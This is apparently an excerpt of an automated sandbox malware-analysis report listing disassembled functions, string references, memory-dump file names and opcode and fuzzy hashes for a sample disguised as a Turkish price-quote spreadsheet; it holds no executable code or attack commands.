Instruction Fuzzy Hash: 50718271F002199BDF19DFB8C850AAEBBB2AF99700F548569E406BB380DF34AD458791

Function 0167AEBA Relevance: 2.7, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

(ocq, xrefs: 0167B079
(ocq, xrefs: 0167AECD

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: (ocq$(ocq
API String ID: 0-3612734936
Opcode ID: b40129708345d56634200ad47d6b7c39290a5cd6095018a204a9b0231e760e59
Instruction ID: 2a70047c047cdc8dced675deed45092fe9223a26c25a36454713df11f78d609e
Opcode Fuzzy Hash: b40129708345d56634200ad47d6b7c39290a5cd6095018a204a9b0231e760e59
Instruction Fuzzy Hash: 8261AC71B005098FCB05DB68DC44AAEBBB6BFC8311B148169E616DB3A1DB34AC46CB90

Function 01679C30 Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

4'cq, xrefs: 01679D84
4'cq, xrefs: 01679D6D

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq
API String ID: 0-60795322
Opcode ID: bd6762055fe4b374988c368b49c07491f8a63fc620cf2b7f4c0e69e3b6d3e171
Instruction ID: 541b214979d145b0cb08f9554b7d218b8a33011978d54f03bccab6aab1b9ce9e
Opcode Fuzzy Hash: bd6762055fe4b374988c368b49c07491f8a63fc620cf2b7f4c0e69e3b6d3e171
Instruction Fuzzy Hash: 25517F727006159FDB01DF6DCC44B6ABBEAEB88328F548466E909CB356DB71DC02C7A1

Function 01678EF8 Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

$cq, xrefs: 01678FD7
$cq, xrefs: 01678FB4

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: $cq$$cq
API String ID: 0-2695052418
Opcode ID: 8d2adb93debc2c0e3764c8244620aec23e4135664704b4068efa93d86236318e
Instruction ID: 9380d691009930712ab623e979370a97cfd00b6946a649088f0ef6884aabe5c0
Opcode Fuzzy Hash: 8d2adb93debc2c0e3764c8244620aec23e4135664704b4068efa93d86236318e
Instruction Fuzzy Hash: B631AD213041128FDB268B6DCC9862E7B6BBB85390B15046AF216CB393EF2CDC81CB55

Function 01670C8F Relevance: 1.8, Strings: 1, Instructions: 545COMMON

Download Yara Rule

Strings

LRcq, xrefs: 01670F19

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: LRcq
API String ID: 0-4134321033
Opcode ID: 3afe809ae83e368d5a6cf7eef798d367d435042caa8db4e5591f56b7e36cdcff
Instruction ID: 04db80a535c0618adc8297317f9b382ac84525c2e256b428a0b3a247b9d4bc97
Opcode Fuzzy Hash: 3afe809ae83e368d5a6cf7eef798d367d435042caa8db4e5591f56b7e36cdcff
Instruction Fuzzy Hash: 3C52DEB8A10219CFCB54DF64EA94A9DBBB2FF88301F1085E9E409A7355DB386D85CF50

Function 01670CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LRcq, xrefs: 01670F19

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: LRcq
API String ID: 0-4134321033
Opcode ID: 42dc703a54372544218411d05a7cb59b8b52612acfd518e16842bdb76690e9bf
Instruction ID: 8f479410f4028bf9bb5f8291f053da41391f765efaa901144263a02e543e96da
Opcode Fuzzy Hash: 42dc703a54372544218411d05a7cb59b8b52612acfd518e16842bdb76690e9bf
Instruction Fuzzy Hash: EC52DFB8A00219CFCB54DF64EA94A9DBBB2FF88301F1085E9E409A7355DB386D85CF51

Function 05B99C08 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

nK{q, xrefs: 05B99CB6

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: nK{q
API String ID: 0-1841028250
Opcode ID: 9b54f437a925dbde4e1c9847ae2ff1ca7c17b90785ff2219926deb585a1d2553
Instruction ID: 8aad286349f1050112e601261a1fa78d1d36e332cb17f9fbe898211dbc190308
Opcode Fuzzy Hash: 9b54f437a925dbde4e1c9847ae2ff1ca7c17b90785ff2219926deb585a1d2553
Instruction Fuzzy Hash: FC6180B4E002199FDF44DFA9D995AEEBBB2FF88300F10802AD919AB354DB355945CF50

Function 05B99C18 Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

nK{q, xrefs: 05B99CB6

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: nK{q
API String ID: 0-1841028250
Opcode ID: 2d3fb30c4a2000c0555766cdc9d2ea481ba5becadfe25bdd27e606f5392a553b
Instruction ID: 1ede08ec762d3259d5b0c71e21f705b2b1248e82d7fd6099b3d1e515eef477f9
Opcode Fuzzy Hash: 2d3fb30c4a2000c0555766cdc9d2ea481ba5becadfe25bdd27e606f5392a553b
Instruction Fuzzy Hash: F1519274E002199FDF44DFA9D995AEEBBB2FF88300F10802AD915AB354DB355945CF50

Function 0167E007 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b9a5bf6ff035e399e31fbc631434e0b21a45abadde0e3ecd98fdf58958ce08f
Instruction ID: b126433cb0802034178f6531d242b793373d56d0b96c8a4c3c6495e4ce35be73
Opcode Fuzzy Hash: 7b9a5bf6ff035e399e31fbc631434e0b21a45abadde0e3ecd98fdf58958ce08f
Instruction Fuzzy Hash: D6129734031A828F96526B20F6EF12ABF6AFF0F767304AC46B00B95544DF79148DEE65

Function 0167E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07e1b3c2385ed4c3fd8c1720405ffcc76fceeeb817b186501f29d0f6ca001e1d
Instruction ID: ba16175a7d72775e8e31398998f5d45a88268e146a493ab770eb5283b1fe50c4
Opcode Fuzzy Hash: 07e1b3c2385ed4c3fd8c1720405ffcc76fceeeb817b186501f29d0f6ca001e1d
Instruction Fuzzy Hash: AB128834031A828F96526B60F6EF12ABF6AFF0F767304AC02B00B95544DF79148DEE65

Function 05B993E9 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 049aea5cb969bd3c9a67bc9f7fa726c3d05b3baa80685aaf7e05ab61dc7fe4b5
Instruction ID: 4616a12613b644d0313b6cebbd1f8c9a09e356cccaac3a3cd0ce05cebe90978e
Opcode Fuzzy Hash: 049aea5cb969bd3c9a67bc9f7fa726c3d05b3baa80685aaf7e05ab61dc7fe4b5
Instruction Fuzzy Hash: 8AC1B275E002699FDB68DF68C994BEEBBB2BB48300F1081E9D50DA7290DB345E85CF51

Function 05B993F8 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1403ffcf59d19e0da6975b552b1411e3a81884d10c0fbfdfc3806403f0357108
Instruction ID: 9fa2749e8e4cb5ccc72c1defc8088622e0e814e4625476c08ae6ce4c49d9b4bb
Opcode Fuzzy Hash: 1403ffcf59d19e0da6975b552b1411e3a81884d10c0fbfdfc3806403f0357108
Instruction Fuzzy Hash: 39B1B274E002699FDB68DF64C994BEEBBB2BB48300F1081E9D50DA7290DB745E85CF51

Function 01679A10 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad92c30c1fe1560613a0bba5f5badf765d199a2450bf2d08eb13c53a4a3b15bf
Instruction ID: a934d965b3f65f21c66baf384947d862fbc7bd7b005b3fa233d36e885959bd3c
Opcode Fuzzy Hash: ad92c30c1fe1560613a0bba5f5badf765d199a2450bf2d08eb13c53a4a3b15bf
Instruction Fuzzy Hash: 088111316016059FCB11DB2CCC80AAABBFAEF85338B54C666D91897359D731F952CBA0

Function 016780D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 198eab455d7be81811b8e124dbf952211fd97410facf3000f9781e45d116e062
Instruction ID: 75b3189065eea61379fe04560e70488e25bb4de41cf16e1d74f4d10791d4c7a2
Opcode Fuzzy Hash: 198eab455d7be81811b8e124dbf952211fd97410facf3000f9781e45d116e062
Instruction Fuzzy Hash: 46713934700A068FDB15DF6CCC98A6A7FEAAF49302B1540A9E916DB371DB70DC41CB91

Function 05B9908A Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4017e2b76fa5ddb745b5cbb7965eedcc7847646544ec95d875ae8b7610b71488
Instruction ID: 46b490b8850299155eed5c7a71e12d0e6a47532fe36c3f89b8658e9bdde8d331
Opcode Fuzzy Hash: 4017e2b76fa5ddb745b5cbb7965eedcc7847646544ec95d875ae8b7610b71488
Instruction Fuzzy Hash: 8761E775E012199FDF08DFE9D994AADBBF2BF88300F14C569E508BB358DA34A841CB50

Function 05B99098 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbe5813d235e75c40716d88eca84156a3dcf9aaf717d86ff015b034175d75066
Instruction ID: 9ef952dec46cb2259ee1de8dc338992446f7d2e0c8e3d2934386c5208d7cc15e
Opcode Fuzzy Hash: cbe5813d235e75c40716d88eca84156a3dcf9aaf717d86ff015b034175d75066
Instruction Fuzzy Hash: 0F61D774E012199FDF08DFE9D994AADBBF2BF88310F14C569E509BB358DA34A841CB50

Function 0167F3F1 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce69deaf2f0e3c2bc5d9bc8167661ecfc30c067f54eec6afe36dea364a3ed743
Instruction ID: d56c076bea32cb27ae9986ad11646ab036d45dd3a56288b08d69fc09961e10d4
Opcode Fuzzy Hash: ce69deaf2f0e3c2bc5d9bc8167661ecfc30c067f54eec6afe36dea364a3ed743
Instruction Fuzzy Hash: F2512474E00218CFDB15DFA4D994AEEBBB2FF88300F608169D805AB359DB795946CF40

Function 05B99E00 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9c91037bdb87123311891da7e4d12497965631db6b4aac4003f1dd141efc67b
Instruction ID: 3cf84a00ca50001a9695ca6c478b6a39db986141760405900ad326c3cefe96a5
Opcode Fuzzy Hash: d9c91037bdb87123311891da7e4d12497965631db6b4aac4003f1dd141efc67b
Instruction Fuzzy Hash: 8951D574E012199FDB44DFA9C894BEEBBB2FF88300F108469E509BB394DB346945CB90

Function 05B99E10 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f091b7109bc988134f9714c69db581636353e7d3f7eaa9d81562140bd5e2a06
Instruction ID: f4cfca6011af3cce82ddcdae4becb0911fd67268f14b3a2023b948fd327e6b35
Opcode Fuzzy Hash: 1f091b7109bc988134f9714c69db581636353e7d3f7eaa9d81562140bd5e2a06
Instruction Fuzzy Hash: 135195B4E012199FDB44DFA9D894BEEBBB2FF88300F108529D515BB394DB346945CB90

Function 05B9987F Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b609d10bcc546d1593e62d26f36465687b817d770a76301704dce709262b8ca
Instruction ID: 111d8d8070c044bebd4163871ae38d802adb11b9141a1e0935386acbe508af78
Opcode Fuzzy Hash: 1b609d10bcc546d1593e62d26f36465687b817d770a76301704dce709262b8ca
Instruction Fuzzy Hash: CA51A574E002199FDB44DFA9D595AEEBBF2FF88300F10842AD509AB354DB34AA45CF90

Function 0167D548 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76b42b9baa37dd6c2ca760deb75ecbaccb0c645b6fb44061249cbd77248bf35f
Instruction ID: b30f95c67c9bd7b365de4c574eb62e1a9776e16d586879dd9ee4612cd23b2ac0
Opcode Fuzzy Hash: 76b42b9baa37dd6c2ca760deb75ecbaccb0c645b6fb44061249cbd77248bf35f
Instruction Fuzzy Hash: 88518274E01218DFDB54DFA9D9849DDBBF2BF89300F208169E819AB365DB31A805CF50

Function 016741A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89aea25b8e517efbf9d0f74654c98262edb6c09693a090ba18232f1d5050318f
Instruction ID: 736a1e7639aebde2168a0327355651841c9243f80e6d1ca220d87c67bbcd71d4
Opcode Fuzzy Hash: 89aea25b8e517efbf9d0f74654c98262edb6c09693a090ba18232f1d5050318f
Instruction Fuzzy Hash: B6518478E01208CFCB48DFA9D99499DBBB2FF89311B209069E815BB364DB35AD41CF54

Function 05B99890 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecb8c6119b7218a3614134a35c04d0d5e441ef4e0ec520c2786eb86c9f98be7b
Instruction ID: e9f4d0c06d3a42ee873ad5a6a504dcc6ec503483d188d84cb4533056a2c518b8
Opcode Fuzzy Hash: ecb8c6119b7218a3614134a35c04d0d5e441ef4e0ec520c2786eb86c9f98be7b
Instruction Fuzzy Hash: 0751B474E002199FCB44DFA9D595AEEBBF2FF88300F20842AD505AB354DB346A45CB90

Function 0167A303 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4decf5b9045aeeddedd51a5d57da85c83d37fd8755951267f990d0a93f5d0018
Instruction ID: 7191df539e784412feb191cd29ceed98f045776a9ae91b3f1293149c9c920a50
Opcode Fuzzy Hash: 4decf5b9045aeeddedd51a5d57da85c83d37fd8755951267f990d0a93f5d0018
Instruction Fuzzy Hash: A3416B31A00249DFCF12CFA8CC49A9EBFB2AF49320F088555E955EB396D375E954CB50

Function 05B98601 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3b14649b9a61518a437a017da308a71ddff656f34eb2b1b12ea1674050f3645
Instruction ID: bb90fc51a996b78cef6a8f471ae856e4d81a6f83f3763a1abdb7619953c42d29
Opcode Fuzzy Hash: f3b14649b9a61518a437a017da308a71ddff656f34eb2b1b12ea1674050f3645
Instruction Fuzzy Hash: AD413475E002199BDF14DFA5C980AEEFBB6FF89700F248169E405B7254EB70B945CB90

Function 01676FC8 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e59f99b46b6d5c2c9c173d3e587b25dfbe833ae7a8ea85d9ac3b726cdcf7c78
Instruction ID: 43be8c72a5ae726fc080f0bc6ff2bed3e64996562c03d4039453b9bc04991f24
Opcode Fuzzy Hash: 5e59f99b46b6d5c2c9c173d3e587b25dfbe833ae7a8ea85d9ac3b726cdcf7c78
Instruction Fuzzy Hash: F941B1B5A04249DFCB12CF68CC48B6EBBB2EF44310F04846AE8159B252DB79DD55CFA1

Function 01675658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da79d3481caac11afda2d385e41411c446c8652cc63b3328ee0f4271b6adb4e8
Instruction ID: c124a9a04ac8e1e7d9cf2373a83fed0d9f5e3877ae9803b01e5f2045cd76c208
Opcode Fuzzy Hash: da79d3481caac11afda2d385e41411c446c8652cc63b3328ee0f4271b6adb4e8
Instruction Fuzzy Hash: D3319C3560021A9FCB019FA8D884ABE7FB2FB88310F404469F9169B350DF39DD25DBA0

Function 01678380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1beb735e22a5970b792ef7c9f78ac784a93f50b21ff48e7a85d9ec278c0e528
Instruction ID: 29415f572ff41f4b87738f4071f53a7e451fccf843f9d4c753e7f4bae09cc670
Opcode Fuzzy Hash: b1beb735e22a5970b792ef7c9f78ac784a93f50b21ff48e7a85d9ec278c0e528
Instruction Fuzzy Hash: 0921B0313112018BDB165A69CC5C63E3A9BAFC4759F54803DD506CB79AEFB5CC46D381

Function 016762F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb7ae2886d21eba7f061b851c9ec1679808bde42afa012186458740518132619
Instruction ID: 9c719b35134e9b802fef707a394e2ecd548023f285d4fa6b0a5d8b65ff5efd01
Opcode Fuzzy Hash: fb7ae2886d21eba7f061b851c9ec1679808bde42afa012186458740518132619
Instruction Fuzzy Hash: 1021F635704A218FE7169A29D89853EBFA2FFC9761704857AE906CB794CF35DC06CB80

Function 016728F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1994032b3743c74cf79c7555e70b2b54e55e1a0c08fc4a29a50cb7addf6a803a
Instruction ID: 82093a0037b189e613d4d5c05ea9ca892bbd7d1a8260e32caca8c32bedb8cf44
Opcode Fuzzy Hash: 1994032b3743c74cf79c7555e70b2b54e55e1a0c08fc4a29a50cb7addf6a803a
Instruction Fuzzy Hash: 3121B035B001069FCB15CF38D9509AE77B5EBDD2A0B24C41DE9199B398EB34EA46CBD0

Function 05B98458 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9563beaa9dc1743ac4c91c76d2f22018db328ba575b1262053ca29106d1dea
Instruction ID: ddfa68bc5478c65aebee3fd187ac5b514f917caa923444c7a52ffd1c4fd450a4
Opcode Fuzzy Hash: ec9563beaa9dc1743ac4c91c76d2f22018db328ba575b1262053ca29106d1dea
Instruction Fuzzy Hash: 943118B5C04218DFCB54CFA9D884ADEBBF4EF48320F14806AE908AB211D7749944CFA1

Function 012BD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513167414.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12bd000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bf956f649a25f1928a11e69368a8345614027038892fd0b0309459bc478fcdf
Instruction ID: 33c52d168945ace1dad6a6bafa58333c555ba945f5ceef1e7c5e4c87cf36a3ff
Opcode Fuzzy Hash: 1bf956f649a25f1928a11e69368a8345614027038892fd0b0309459bc478fcdf
Instruction Fuzzy Hash: B4213471524208DFCB11CF68C9C0BA6BB65FB84398F24C96DE9090B246C77BD846CB61

Function 05B98460 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 665f7ac8f189ca56670155bded7154be0c1df9102280ce926f4c3397a1b2c78a
Instruction ID: c1dfa42ebaf0b43be97e7e98fedbf5ad383c0587647f768b663a297d85687303
Opcode Fuzzy Hash: 665f7ac8f189ca56670155bded7154be0c1df9102280ce926f4c3397a1b2c78a
Instruction Fuzzy Hash: 912104B1D012189FCB54CFA9D884ADEFBF4EB48320F14806AE818AB315D774A944CFA1

Function 0167AEF0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b485b28a9782c617763a164b8de290f541834605f8f370fb005e795a5bef07c6
Instruction ID: 63e50f62d6c248483337e2a41e935d7e366acb14f537cf680a048f58a597aac5
Opcode Fuzzy Hash: b485b28a9782c617763a164b8de290f541834605f8f370fb005e795a5bef07c6
Instruction Fuzzy Hash: 9F219076A102049FDB149F58DC96BDEBFB5FB8C320F58806AE915A7390DA31AC14CB90

Function 05B99A51 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ed876c677d727ca4d66ba8bc218eb03200e3e45f2679d4e9c07537036bbc01
